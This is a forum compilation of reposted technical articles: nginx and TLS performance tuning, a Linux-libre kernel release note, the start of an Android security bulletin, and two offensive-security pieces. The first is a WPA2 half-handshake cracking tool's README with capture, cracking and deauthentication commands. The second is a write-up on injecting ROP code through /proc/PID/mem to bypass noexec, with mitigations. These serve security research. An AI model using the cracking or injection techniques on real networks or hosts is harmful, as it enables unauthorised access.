net.ipv4.tcp_mtu_probing=1—useful if there are ICMP blackholes between you and your clients (most likely there are).
net.ipv4.tcp_rmem, net.ipv4.tcp_wmem—should be tuned to fit the BDP, just don’t forget that bigger isn’t always better.
echo 2 > /sys/module/tcp_cubic/parameters/hystart_detect—if you are using fq+cubic, this might help with tcp_cubic exiting slow-start too early.
It is also worth noting that there is an RFC draft (though a bit inactive) from the author of curl, Daniel Stenberg, named TCP Tuning for HTTP, that tries to aggregate all system tunings that may be beneficial to HTTP in a single place.
Application level: Midlevel Tooling
Just like with the kernel, having up-to-date userspace is very important. You should start with upgrading your tools, for example you can package newer versions of perf, bcc, etc. Once you have new tooling you are ready to properly tune and observe the behavior of a system. Throughout this part of the post we’ll be mostly relying on on-CPU profiling with perf top, on-CPU flamegraphs, and ad-hoc histograms from bcc’s funclatency.
Compiler Toolchain
Having a modern compiler toolchain is essential if you want to compile hardware-optimized assembly, which is present in many libraries commonly used by web servers. Aside from the performance, newer compilers have new security features (e.g. [-fstack-protector-strong](https://docs.google.com/document/d/1xXBH6rRZue4f296vGt9YQcuLVQHeE516stHwt8M9xyU/edit) or [SafeStack](https://clang.llvm.org/docs/SafeStack.html)) that you want to be applied on the edge. The other use case for modern toolchains is when you want to run your test harnesses against binaries compiled with sanitizers (e.g. AddressSanitizer, and friends).
System libraries
It’s also worth upgrading system libraries, like glibc, since otherwise you may be missing out on recent optimizations in low-level functions from -lc, -lm, -lrt, etc. The test-it-yourself warning also applies here, since occasional regressions creep in.
Zlib
Normally the web server would be responsible for compression. Depending on how much data is going through that proxy, you may occasionally see zlib’s symbols in perf top, e.g.:
# perf top
...
   8.88%  nginx  [.] longest_match
   8.29%  nginx  [.] deflate_slow
   1.90%  nginx  [.] compress_block
There are ways of optimizing that on the lowest levels: both Intel and Cloudflare, as well as the standalone zlib-ng project, have their own zlib forks which provide better performance by utilizing new instruction sets.
Malloc
We’ve been mostly CPU-oriented when discussing optimizations up until now, but let’s switch gears and discuss memory-related optimizations.
If you use lots of Lua with FFI or heavy third party modules that do their own memory management, you may observe increased memory usage due to fragmentation. You can try solving that problem by switching to either jemalloc or tcmalloc. Using a custom malloc also has the following benefits:
Separating your nginx binary from the environment, so that glibc version upgrades and OS migration will affect it less.
Better introspection, profiling and stats.
PCRE
If you use many complex regular expressions in your nginx configs or heavily rely on Lua, you may see pcre-related symbols in perf top. You can optimize that by compiling PCRE with JIT, and also enabling it in nginx via pcre_jit on;.
You can check the result of the optimization by either looking at flame graphs, or using funclatency:
# funclatency /srv/nginx-bazel/sbin/nginx:ngx_http_regex_exec -u
...
     usecs               : count     distribution
         0 -> 1          : 1159     |**********                              |
         2 -> 3          : 4468     |****************************************|
         4 -> 7          : 622      |*****                                   |
         8 -> 15         : 610      |*****                                   |
        16 -> 31         : 209      |*                                       |
        32 -> 63         : 91       |                                        |
TLS
If you are terminating TLS on the edge without being fronted by a CDN, then TLS performance optimizations may be highly valuable. When discussing tunings we’ll be mostly focusing on server-side efficiency.
So, nowadays the first thing you need to decide is which TLS library to use: Vanilla OpenSSL, OpenBSD’s LibreSSL, or Google’s BoringSSL. After picking the TLS library flavor, you need to properly build it: OpenSSL, for example, has a bunch of build-time heuristics that enable optimizations based on the build environment; BoringSSL has deterministic builds, but sadly is way more conservative and just disables some optimizations by default. Anyway, here is where choosing a modern CPU should finally pay off: most TLS libraries can utilize everything from AES-NI and SSE to ADX and AVX512. You can use the built-in performance tests that come with your TLS library, e.g. in BoringSSL’s case it’s bssl speed.
Most of the performance comes not from the hardware you have, but from the cipher suites you are going to use, so you have to optimize them carefully. Also know that changes here can (and will!) affect the security of your web server—the fastest ciphersuites are not necessarily the best. If unsure what encryption settings to use, the Mozilla SSL Configuration Generator is a good place to start.
Asymmetric Encryption
If your service is on the edge, then you may observe a considerable amount of TLS handshakes and therefore have a good chunk of your CPU consumed by the asymmetric crypto, making it an obvious target for optimizations.
To optimize server-side CPU usage you can switch to ECDSA certs, which are generally 10x faster than RSA. They are also considerably smaller, so they may speed up the handshake in the presence of packet loss. But ECDSA is also heavily dependent on the quality of your system’s random number generator, so if you are using OpenSSL, be sure to have enough entropy (with BoringSSL you do not need to worry about that).
As a side note, it is worth mentioning that bigger is not always better, e.g. using 4096-bit RSA certs will degrade your performance by 10x:
$ bssl speed
Did 1517 RSA 2048 signing ... (1507.3 ops/sec)
Did 160 RSA 4096 signing ... (153.4 ops/sec)
To make it worse, smaller isn’t necessarily the best choice either: by using the less common P-224 field for ECDSA you’ll get 60% worse performance compared to the more common P-256:
$ bssl speed
Did 7056 ECDSA P-224 signing ... (6831.1 ops/sec)
Did 17000 ECDSA P-256 signing ... (16885.3 ops/sec)
The rule of thumb here is that the most commonly used encryption is generally the most optimized one. When running a properly optimized OpenSSL-based library using RSA certs, you should see the following traces in your perf top. AVX2-capable, but not ADX-capable boxes (e.g. Haswell) should use the AVX2 codepath:
  6.42%  nginx  [.] rsaz_1024_sqr_avx2
  1.61%  nginx  [.] rsaz_1024_mul_avx2
While newer hardware should use a generic Montgomery multiplication with the ADX codepath:
  7.08%  nginx  [.] sqrx8x_internal
  2.30%  nginx  [.] mulx4x_internal
Symmetric Encryption
If you have lots of bulk transfers like videos, photos, or more generically files, then you may start observing symmetric encryption symbols in the profiler’s output. Here you just need to make sure that your CPU has AES-NI support and you set your server-side preferences for AES-GCM ciphers. Properly tuned hardware should show the following in perf top:
  8.47%  nginx  [.] aesni_ctr32_ghash_6x
But it’s not only your servers that will need to deal with encryption/decryption—your clients will share the same burden on way less capable CPUs. Without hardware acceleration this may be quite challenging, therefore you may consider using an algorithm that was designed to be fast without hardware acceleration, e.g. ChaCha20-Poly1305. This will reduce TTLB for some of your mobile clients.
ChaCha20-Poly1305 is supported in BoringSSL out of the box; for OpenSSL 1.0.2 you may consider using the Cloudflare patches. BoringSSL also supports “equal preference cipher groups,” so you may use the following config to let clients decide what ciphers to use based on their hardware capabilities (shamelessly stolen from cloudflare/sslconfig):
ssl_ciphers '[ECDHE-ECDSA-AES128-GCM-SHA256|ECDHE-ECDSA-CHACHA20-POLY1305|ECDHE-RSA-AES128-GCM-SHA256|ECDHE-RSA-CHACHA20-POLY1305]:ECDHE+AES128:RSA+AES128:ECDHE+AES256:RSA+AES256:ECDHE+3DES:RSA+3DES';
ssl_prefer_server_ciphers on;
Application level: Highlevel
To analyze the effectiveness of your optimizations on that level you will need to collect RUM data. In browsers you can use Navigation Timing APIs and Resource Timing APIs. Your main metrics are TTFB and TTV/TTI. Having that data in easily queryable and graphable formats will greatly simplify iteration.
Compression
Compression in nginx starts with the mime.types file, which defines the default correspondence between file extension and response MIME type. Then you need to define what types you want to pass to your compressor with e.g. [gzip_types](http://nginx.org/en/docs/http/ngx_http_gzip_module.html#gzip_types). If you want the complete list you can use mime-db to autogenerate your mime.types and to add those with .compressible == true to gzip_types.
When enabling gzip, be careful about two aspects of it:
Increased memory usage. This can be solved by limiting gzip_buffers.
Increased TTFB due to the buffering. This can be solved by using [gzip_no_buffer](http://hg.nginx.org/nginx/file/c7d4017c8876/src/http/modules/ngx_http_gzip_filter_module.c#l182).
As a side note, http compression is not limited to gzip exclusively: nginx has a third party [ngx_brotli](https://github.com/google/ngx_brotli) module that can improve compression ratio by up to 30% compared to gzip.
As for compression settings themselves, let’s discuss two separate use cases: static and dynamic data. For static data you can achieve maximum compression ratios by pre-compressing your static assets as a part of the build process.
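As a minimal sketch of what that can look like (the file name is a placeholder, and gzip_static assumes nginx was built with the gzip_static module):
# at build time, generate the compressed variant next to the original
gzip -9 -k site.css        # produces site.css.gz; zopfli can squeeze out a few extra percent in the same format
# in the nginx config, serve the pre-compressed file whenever the client accepts gzip
gzip_static on;
The ngx_brotli module mentioned above provides an analogous brotli_static directive for pre-compressed .br files.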
We discussed that in quite a lot of detail in the Deploying Brotli for static content post for both gzip and brotli.
For dynamic data you need to carefully balance a full roundtrip: time to compress the data + time to transfer it + time to decompress on the client. Therefore setting the highest possible compression level may be unwise, not only from a CPU usage perspective, but also in terms of TTFB.
Buffering
Buffering inside the proxy can greatly affect web server performance, especially with respect to latency. The nginx proxy module has various buffering knobs that are togglable on a per-location basis; each of them is useful for its own purpose. You can separately control buffering in both directions via proxy_request_buffering and proxy_buffering. If buffering is enabled, the upper limit on memory consumption is set by client_body_buffer_size and proxy_buffers; after hitting these thresholds the request/response is buffered to disk. For responses this can be disabled by setting proxy_max_temp_file_size to 0.
The most common approaches to buffering are:
Buffer the request/response up to some threshold in memory and then overflow to disk. If request buffering is enabled, you only send a request to the backend once it is fully received, and with response buffering, you can instantaneously free a backend thread once it is ready with the response. This approach has the benefits of improved throughput and backend protection at the cost of increased latency and memory/IO usage (though if you use SSDs that may not be much of a problem).
No buffering. Buffering may not be a good choice for latency-sensitive routes, especially ones that use streaming. For them you may want to disable it, but now your backend needs to deal with slow clients (incl. malicious slow-POST/slow-read kinds of attacks).
Application-controlled response buffering through the [X-Accel-Buffering](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/#x-accel-buffering) header.
Whatever path you choose, do not forget to test its effect on both TTFB and TTLB. Also, as mentioned before, buffering can affect IO usage and even backend utilization, so keep an eye out for that too.
TLS
Now we are going to talk about high-level aspects of TLS and latency improvements that can be achieved by properly configuring nginx. Most of the optimizations I’ll be mentioning are covered in the High Performance Browser Networking “Optimizing for TLS” section and the Making HTTPS Fast(er) talk at nginx.conf 2014. Tunings mentioned in this part will affect both the performance and security of your web server; if unsure, please consult Mozilla’s Server Side TLS Guide and/or your Security Team.
To verify the results of optimizations you can use:
WebpageTest for impact on performance.
SSL Server Test from Qualys, or Mozilla TLS Observatory for impact on security.
Session resumption
As DBAs love to say, “the fastest query is the one you never make.” The same goes for TLS—you can reduce latency by one RTT if you cache the result of the handshake. There are two ways of doing that:
You can ask the client to store all session parameters (in a signed and encrypted way), and send them to you during the next handshake (similar to a cookie). On the nginx side this is configured via the ssl_session_tickets directive. This does not consume any memory on the server side but has a number of downsides:
You need the infrastructure to create, rotate, and distribute random encryption/signing keys for your TLS sessions.
Just remember that you really shouldn’t 1) use source control to store ticket keys 2) generate these keys from other non-ephemeral material, e.g. date or cert.
PFS won’t be on a per-session basis but on a per-tls-ticket-key basis, so if an attacker gets a hold of the ticket key, they can potentially decrypt any captured traffic for the duration of the ticket.
Your encryption will be limited to the size of your ticket key. It does not make much sense to use AES256 if you are using a 128-bit ticket key. Nginx supports both 128-bit and 256-bit TLS ticket keys.
Not all clients support ticket keys (all modern browsers do support them though).
Or you can store TLS session parameters on the server and only give a reference (an id) to the client. This is done via the ssl_session_cache directive. It has the benefit of preserving PFS between sessions and greatly limiting the attack surface. Though the session cache has its own downsides:
It consumes ~256 bytes of memory per session on the server, which means you can’t store many sessions for too long.
The cache cannot be easily shared between servers. Therefore you either need a load balancer which will send the same client to the same server to preserve cache locality, or write a distributed TLS session storage on top of something like [ngx_http_lua_module](https://github.com/openresty/lua-resty-core/blob/master/lib/ngx/ssl/session.md).
As a side note, if you go with the session ticket approach, then it’s worth using 3 keys instead of one, e.g.:
ssl_session_tickets on;
ssl_session_timeout 1h;
ssl_session_ticket_key /run/nginx-ephemeral/nginx_session_ticket_curr;
ssl_session_ticket_key /run/nginx-ephemeral/nginx_session_ticket_prev;
ssl_session_ticket_key /run/nginx-ephemeral/nginx_session_ticket_next;
You will always be encrypting with the current key, but accepting sessions encrypted with both the next and previous keys.
OCSP Stapling
You should staple your OCSP responses, since otherwise:
Your TLS handshake may take longer because the client will need to contact the certificate authority to fetch OCSP status.
An OCSP fetch failure may result in an availability hit.
You may compromise users’ privacy since their browser will contact a third party service indicating that they want to connect to your site.
To staple the OCSP response you can periodically fetch it from your certificate authority, distribute the result to your web servers, and use it with the ssl_stapling_file directive:
ssl_stapling_file /var/cache/nginx/ocsp/www.der;
TLS record size
TLS breaks data into chunks called records, which you can’t verify and decrypt until you receive them in their entirety. You can measure this latency as the difference between TTFB from the network stack and application points of view.
By default nginx uses 16k chunks, which do not even fit into the IW10 congestion window and therefore require an additional roundtrip. Out of the box, nginx provides a way to set record sizes via the ssl_buffer_size directive:
To optimize for low latency you should set it to something small, e.g. 4k. Decreasing it further will be more expensive from a CPU usage perspective.
To optimize for high throughput you should leave it at 16k.
There are two problems with static tuning:
You need to tune it manually.
You can only set ssl_buffer_size on a per-nginx-config or per-server-block basis, therefore if you have a server with mixed latency/throughput workloads you’ll need to compromise.
There is an alternative approach: dynamic record size tuning. There is an nginx patch from Cloudflare that adds support for dynamic record sizes.
It may be a pain to configure initially, but once you are done with it, it works quite nicely.
TLS 1.3
TLS 1.3 features indeed sound very nice, but unless you have the resources to be troubleshooting TLS full-time I would suggest not enabling it, since:
It is still a draft.
The 0-RTT handshake has some security implications. And your application needs to be ready for it.
There are still middleboxes (antiviruses, DPIs, etc.) that block unknown TLS versions.
Avoid Eventloop Stalls
Nginx is an eventloop-based web server, which means it can only do one thing at a time. Even though it seems that it does all of these things simultaneously, like in time-division multiplexing, all nginx does is quickly switch between events, handling one after another. It all works because handling each event takes only a couple of microseconds. But if it starts taking too much time, e.g. because it requires going to a spinning disk, latency can skyrocket.
If you start noticing that your nginx is spending too much time inside the ngx_process_events_and_timers function, and the distribution is bimodal, then you probably are affected by eventloop stalls.
# funclatency '/srv/nginx-bazel/sbin/nginx:ngx_process_events_and_timers' -m
     msecs               : count     distribution
         0 -> 1          : 3799     |****************************************|
         2 -> 3          : 0        |                                        |
         4 -> 7          : 0        |                                        |
         8 -> 15         : 0        |                                        |
        16 -> 31         : 409      |****                                    |
        32 -> 63         : 313      |***                                     |
        64 -> 127        : 128      |*                                       |
AIO and Threadpools
Since the main source of eventloop stalls, especially on spinning disks, is IO, you should probably look there first. You can measure how much you are affected by it by running fileslower:
# fileslower 10
Tracing sync read/writes slower than 10 ms
TIME(s)  COMM           TID    D BYTES   LAT(ms) FILENAME
2.642    nginx          69097  R 5242880   12.18 0002121812
4.760    nginx          69754  W 8192      42.08 0002121598
4.760    nginx          69435  W 2852      42.39 0002121845
4.760    nginx          69088  W 2852      41.83 0002121854
To fix this, nginx has support for offloading IO to a threadpool (it also has support for AIO, but native AIO in Unixes has lots of quirks, so it is better to avoid it unless you know what you are doing). A basic setup consists of simply:
aio threads;
aio_write on;
For more complicated cases you can set up custom [thread_pool](http://nginx.org/en/docs/ngx_core_module.html#thread_pool)‘s, e.g. one per disk, so that if one drive becomes wonky, it won’t affect the rest of the requests. Thread pools can greatly reduce the number of nginx processes stuck in the D state, improving both latency and throughput. But they won’t eliminate eventloop stalls fully, since not all IO operations are currently offloaded to them.
Logging
Writing logs can also take a considerable amount of time, since it is hitting disks. You can check whether that’s the case by running ext4slower and looking for access/error log references:
# ext4slower 10
TIME     COMM           PID    T BYTES   OFF_KB   LAT(ms) FILENAME
06:26:03 nginx          69094  W 163070  634126     18.78 access.log
06:26:08 nginx          69094  W 151     126029     37.35 error.log
06:26:13 nginx          69082  W 153168  638728    159.96 access.log
It is possible to work around this by spooling access logs in memory before writing them, using the buffer parameter of the access_log directive. By using the gzip parameter you can also compress the logs before writing them to disk, reducing IO pressure even more. But to fully eliminate IO stalls on log writes you should just write logs via syslog; this way logs will be fully integrated with the nginx eventloop.
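A hedged example of what that can look like in the nginx config (the buffer size, flush interval, and syslog tag here are assumptions to adapt to your setup):
# buffer and compress access logs in memory, flushing to disk at most once a minute
access_log /var/log/nginx/access.log combined buffer=64k gzip flush=1m;
# or hand them off to the local syslog daemon and keep log IO out of the event loop entirely
access_log syslog:server=unix:/dev/log,tag=nginx combined;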
Open file cache
Since open(2) calls are inherently blocking and web servers are routinely opening/reading/closing files, it may be beneficial to have a cache of open files. You can see how much benefit there is by looking at the ngx_open_cached_file function latency:
# funclatency /srv/nginx-bazel/sbin/nginx:ngx_open_cached_file -u
     usecs               : count     distribution
         0 -> 1          : 10219    |****************************************|
         2 -> 3          : 21       |                                        |
         4 -> 7          : 3        |                                        |
         8 -> 15         : 1        |                                        |
If you see that either there are too many open calls or there are some that take too much time, you can look at enabling the open file cache:
open_file_cache max=10000;
open_file_cache_min_uses 2;
open_file_cache_errors on;
After enabling open_file_cache you can observe all the cache misses by looking at opensnoop and deciding whether you need to tune the cache limits:
# opensnoop -n nginx
PID    COMM               FD ERR PATH
69435  nginx             311   0 /srv/site/assets/serviceworker.js
69086  nginx             158   0 /srv/site/error/404.html
...
Wrapping up
All the optimizations that were described in this post are local to a single web server box. Some of them improve scalability and performance. Others are relevant if you want to serve requests with minimal latency or deliver bytes faster to the client. But in our experience a huge chunk of user-visible performance comes from more high-level optimizations that affect the behavior of the Dropbox Edge Network as a whole, like ingress/egress traffic engineering and smarter Internal Load Balancing. These problems are on the edge (pun intended) of knowledge, and the industry has only just started approaching them.
If you’ve read this far you probably want to work on solving these and other interesting problems! You’re in luck: Dropbox is looking for experienced SWEs, SREs, and Managers.
Sursa: https://blogs.dropbox.com/tech/2017/09/optimizing-web-servers-for-high-throughput-and-low-latency/
  11. GNU Linux-Libre 4.13 Kernel Launches Officially for Those Who Seek 100% Freedom It is based on the Linux 4.13 kernel series Sep 6, 2017 19:13 GMT · By Marius Nestor · Alexandre Oliva, the maintainer of the GNU Linux-libre project, an Open Source initiative to provide a 100% free version of the Linux kernel to those who seek 100% freedom, announced the release of the GNU Linux-libre 4.13 kernel. New GNU Linux-libre releases always come out a few days after the final release of a new Linux kernel branch. Therefore, as Linux kernel 4.13 was officially unveiled this past weekend by Linus Torvalds, it's time for a new GNU Linux-libre version, in this case GNU Linux-libre 4.13. The GNU Linux-libre 4.13 kernel appears to be a big release that deblobbed more drivers than the previous one. Among the drivers that needed deblobbing, we can mention both the Qualcomm Venus V4L2 encoder and decoder, Qualcomm's ADSP and WCNSS, as well as Inside Secure's SafeXcel cryptographic engine. The Mellanox Technologies Spectrum, Cavium Nitrox CNN55XX, and Quantenna QSR10g drivers needed deblobbing as well in GNU Linux-libre 4.13, which also adds small modifications to the per-release deblobbing logic for the Redpine Signals WLAN, IWLWIFI, and AMDGPU drivers because the source code was rearranged. Once deblobbed the kernel is compiled as usual According to the mailing list announcement, deblobbing was also required for the ath10k, Adreno A5xx, brcmfmac, Intel i915 CSR, Silead DMI, and wil6210 drivers. The GNU Linux-libre developers have revealed the fact that version 4.13, which is based on Linux kernel 4.13, will compile as usual once deblobbed. Therefore, if you're looking to have a 100% free operating system running under the hood of your personal computer, we recommend downloading and compiling the GNU Linux-libre 4.13 kernel. If not, you can go ahead and upgrade to the Linux 4.13 kernel, which is also available for download right now on our website or from kernel.org. Sursa: http://news.softpedia.com/news/gnu-linux-libre-4-13-launches-officially-for-those-who-seek-100-freedom-517624.shtml
12. WPA2-HalfHandshake-Crack
Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full four-way handshake is then used in a dictionary attack. This tool is a Proof of Concept to show that it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client within range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against it. For more information on general wifi hacking, see here
Install
$ sudo python setup.py install
Sample use
$ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"
-r Where to read input pcap file with half handshake (works with full handshakes too)
-m AP mac address (from the 'fake' access point that was used during the capture)
-s AP SSID
-d (optional) Where to read dictionary from
Capturing half handshakes
To listen for device probes the aircrack suite can be used as follows:
sudo airmon-ng start wlan0
sudo airodump-ng mon0
You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted.
Set up a WPA2 WiFi network with an SSID the same as the desired device probe. The passphrase can be anything. In Ubuntu this can be done here http://ubuntuhandbook.org/index.php/2014/09/3-ways-create-wifi-hotspot-ubuntu/
Capture traffic on this interface. In Linux this can be achieved with tcpdump:
sudo tcpdump -i wlan0 -s 65535 -w file.cap
(optional) Deauthenticate clients from nearby WiFi networks to increase probes. If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks http://www.aircrack-ng.org/doku.php?id=deauthentication
Sursa: https://github.com/dxa4481/WPA2-HalfHandshake-Crack
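For the optional deauthentication step above, a hedged example with the aircrack-ng suite (AP_BSSID is a placeholder for the target network's MAC, and mon0 is the monitor interface created by airmon-ng earlier) would be:
sudo aireplay-ng --deauth 10 -a <AP_BSSID> mon0
Disconnected clients will usually probe for their known networks while reconnecting, which is exactly the kind of (not associated) probe traffic airodump-ng is watching for.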
  13. Linux based inter-process code injection without ptrace(2) Tuesday, September 5, 2017 at 5:01AM Using the default permission settings found in most major Linux distributions it is possible for a user to gain code injection in a process, without using ptrace. Since no syscalls are required using this method, it is possible to accomplish the code injection using a language as simple and ubiquitous as Bash. This allows execution of arbitrary native code, when only a standard Bash shell and coreutils are available. Using this technique, we will show that the noexec mount flag can be bypassed by crafting a payload which will execute a binary from memory. The /proc filesystem on Linux offers introspection of the running of the Linux system. Each process has its own directory in the filesystem, which contains details about the process and its internals. Two pseudo files of note in this directory are maps and mem. The maps file contains a map of all the memory regions allocated to the binary and all of the included dynamic libraries. This information is now relatively sensitive as the offsets to each library location are randomised by ASLR. Secondly, the mem file provides a sparse mapping of the full memory space used by the process. Combined with the offsets obtained from the maps file, the mem file can be used to read from and write directly into the memory space of a process. If the offsets are wrong, or the file is read sequentially from the start, a read/write error will be returned, because this is the same as reading unallocated memory, which is inaccessible. The read/write permissions on the files in these directories are determined by the ptrace_scope file in /proc/sys/kernel/yama, assuming no other restrictive access controls are in place (such as SELinux or AppArmor). The Linux kernel offers documentation for the different values this setting can be set to. For the purposes of this injection, there are two pairs of settings. The lower security settings, 0 and 1, allow either any process under the same uid, or just the parent process, to write to a processes /proc/${PID}/mem file, respectively. Either of these settings will allow for code injection. The more secure settings, 2 and 3, restrict writing to admin-only, or completely block access respectively. Most major operating systems were found to be configured with ‘1’ by default, allowing only the parent of a process to write into its /proc/${PID}/mem file. This code injection method utilises these files, and the fact that the stack of a process is stored inside a standard memory region. This can be seen by reading the maps file for a process: $ grep stack /proc/self/maps 7ffd3574b000-7ffd3576c000 rw-p 00000000 00:00 0 [stack] Among other things, the stack contains the return address (on architectures that do not use a ‘link register’ to store the return address, such as ARM), so a function knows where to continue execution when it has completed. Often, in attacks such as buffer overflows, the stack is overwritten, and the technique known as ROP is used to assert control over the targeted process. This technique replaces the original return address with an attacker controlled return address. This will allow an attacker to call custom functions or syscalls by controlling execution flow every time the ret instruction is executed. This code injection does not rely on any kind of buffer overflow, but we do utilise a ROP chain. 
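To make the maps/mem primitive concrete, here is a minimal sketch (assuming ptrace_scope is 0; with the default value of 1 the same access only works from the actual parent process, which is exactly why the injection script described below ends with an exec dd) that locates the stack of a child and dumps its topmost bytes straight out of /proc/${PID}/mem:
sleep 60 &
PID=$!
# the first field of the [stack] line is "start-end" of the stack mapping
STACK_END=$(grep -F '[stack]' /proc/$PID/maps | cut -d' ' -f1 | cut -d- -f2)
# seek to 64 bytes below the top of the stack and hexdump them (environment strings live up there)
dd if=/proc/$PID/mem bs=1 skip=$(( 16#$STACK_END - 64 )) count=64 2>/dev/null | od -A x -t x1
Writing works the same way through dd's seek= parameter, which is what the injection below relies on.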
Given the level of access we are granted, we can directly overwrite the stack as present in /proc/${PID}/mem. Therefore, the method uses the /proc/self/maps file to find the ASLR random offsets, from which we can locate functions inside a target process. With these function addresses we can replace the normal return addresses present on the stack and gain control of the process. To ensure that the process is in an expected state when we are overwriting the stack, we use the sleep command as the slave process which is overwritten. The sleep command uses the nanosleep syscall internally, which means that the sleep command will sit inside the same function for almost its entire life (excluding setup and teardown). This gives us ample opportunity to overwrite the stack of the process before the syscall returns, at which point we will have taken control with our manufactured chain of ROP gadgets. To ensure that the location of the stack pointer at the time of the syscall execution, we prefix our payload with a NOP sled, which will allow the stack pointer to be at almost any valid location, which upon return will just increase the stack pointer until it gets to and executes our payload. A general purpose implementation for code injection can be found at https://github.com/GDSSecurity/Dunkery. Efforts were made to limit the external dependencies of this script, as in some very restricted environments utility binaries may not be available. The current list of dependencies are: GNU grep (Must support -Fao --byte-offset) dd (required for reading/writing to an absolute offset into a file) Bash (for the math and other advanced scripting features) The general flow of this script is as follows: Launch a copy of sleep in the background and record its process id (PID). As mentioned above, the sleep command is an ideal candidate for injection as it only executes one function for its whole life, meaning we won’t end up with unexpected state when overwriting the stack. We use this process to find out which libraries are loaded when the process is instantiated. Using /proc/${PID}/maps we try to find all the gadgets we need. If we can’t find a gadget in the automatically loaded libraries we will expand our search to system libraries in /usr/lib. If we then find the gadget in any other library we can load that library into our next slave using LD_PRELOAD. This will make the missing gadgets available to our payload. We also verify that the gadgets we find (using a naive ‘grep’) are within the .text section of the library. If they are not, there is a risk they will not be loaded in executable memory on execution, causing a crash when we try to return to the gadget. This ‘preload’ stage should result in a possibly empty list of libraries containing gadgets missing from the standard loaded libraries. Once we have confirmed all gadgets can be available to us, we launch another sleep process, LD_PRELOADing the extra libraries if necessary. We now re-find the gadgets in the libraries, and we relocate them to the correct ASLR base, so we know their location in the memory space of the target region, rather than just the binary on disk. As above, we verify that the gadget is in an executable memory region before we commit to using it. The list of gadgets we require is relatively short. We require a NOP for the above discussed NOP sled, enough POP gadgets to fill all registers required for a function call, a gadget for calling a syscall, and a gadget for calling a standard function. 
This combination will allow us to call any function or syscall, but does not allow us to perform any kind of logic. Once these gadgets have been located, we can convert pseudo instructions from our payload description file into a ROP payload. For example, for a 64bit system, the line ‘syscall 60 0’ will convert to ROP gadgets to load ‘60’ into the RAX register, ‘0’ into RDI, and a syscall gadget. This should result in 40 bytes of data: 3 addresses and 2 constants, all 8 bytes. This syscall, when executed, would call exit(0). We can also call functions present in the PLT, which includes functions imported from external libraries, such as glibc. To locate the offsets for these functions, as they are called by pointer rather than syscall number, we need to first parse the ELF section headers in the target library to find the function offset. Once we have the offset we can relocate these as with the gadgets, and add them to our payload. String arguments have also been handled, as we know the location of the stack in memory, so we can append strings to our payload and add pointers to them as necessary. For example, the fexecve syscall requires a char** for the arguments array. We can generate the array of pointers before injection inside our payload and upon execution the pointer on the stack to the array of pointers can be used as with a normal stack allocated char**. Once the payload has been fully serialized, we can overwrite the stack inside the process using dd, and the offset to the stack obtained from the /proc/${PID}/maps file. To ensure that we do not encounter any permissions issues, it is necessary for the injection script to end with the ‘exec dd’ line, which replaces the bash process with the dd process, therefore transferring parental ownership over the sleep program from bash to dd. After the stack has been overwritten, we can then wait for the nanosleep syscall used by the sleep binary to return, at which point our ROP chain gains control of the application and our payload will be executed. The specific payload to be injected as a ROP chain can reasonably be anything that does not require runtime logic. The current payload in use is a simple open/memfd_create/sendfile/fexecve program. This disassociates the target binary with the filesystem noexec mount flag, and the binary is then executed from memory, bypassing the noexec restriction. Since the sleep binary is backgrounded on execution by bash, it is not possible to interact with the binary to be executed, as it does not have a parent after dd exits. To bypass this restriction, it is possible to use one of the examples present in the libfuse distribution, assuming fuse is present on the target system: the passthrough binary will create a mirrored mount of the root filesystem to the destination directory. This new mount is not mounted noexec, and therefore it is possible to browse through this new mount to a binary, which will then be executable. A proof of concept video shows this passthrough payload allowing execution of a binary in the current directory, as a standard child of the shell. Future work: To speed up execution, it would be useful to cache the gadget offset from its respective ASLR base between the preload and the main run. This could be accomplished by dumping an associative array to disk using declare -p, but touching disk is not necessarily always appropriate. 
Alternatives include rearchitecting the script to execute the payload script in the same environment as the main bash process, rather than a child executed using $(). This would allow for the sharing of environmental variables bidirectionally. Limit the external dependencies further by removing the requirement for GNU grep. This was previously attempted and deemed too slow when finding gadgets, but may be possible with more optimised code. The obvious mitigation strategy for this technique is to set ptrace_scope to a more restrictive value. A value of 2 (superuser only) is the minimum that would block this technique, whilst not completely disabling ptrace on the system, but care should be taken to ensure that ptrace as a normal user is not in use. This value can be set by adding the following line to /etc/sysctl.conf: kernel.yama.ptrace_scope=2 Other mitigation strategies include combinations of Seccomp, SELinux or Apparmor to restrict the permissions on sensitive files such as /proc/${PID}/maps or /proc/${PID}/mem. The proof of concept code, and Bash ROP generator can be found at https://github.com/GDSSecurity/Cexigua Rory McNamara Sursa: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
  14. Android Security Bulletin—September 2017 Published September 5, 2017 The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of September 05, 2017 or later address all of these issues. Refer to the Pixel and Nexus update schedule to learn how to check a device's security patch level. Partners were notified of the issues described in the bulletin at least a month ago. Source code patches for these issues will be released to the Android Open Source Project (AOSP) repository in the next 7 days. We will revise this bulletin with the AOSP links when they are available. The most severe of these issues is a critical severity vulnerability in media framework that could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed. We have had no reports of active customer exploitation or abuse of these newly reported issues. Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform. We encourage all customers to accept these updates to their devices. Note: Information on the latest over-the-air update (OTA) and firmware images for Google devices is available in the Google device updates section. Announcements This bulletin has two security patch level strings to provide Android partners with the flexibility to more quickly fix a subset of vulnerabilities that are similar across all Android devices. See Common questions and answers for additional information: 2017-09-01: Partial security patch level string. This security patch level string indicates that all issues associated with 2017-09-01 (and all previous security patch level strings) are addressed. 2017-09-05: Complete security patch level string. This security patch level string indicates that all issues associated with 2017-09-01 and 2017-09-05 (and all previous security patch level strings) are addressed. Android and Google service mitigations This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android. Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible. The Android security team actively monitors for abuse through Google Play Protect and 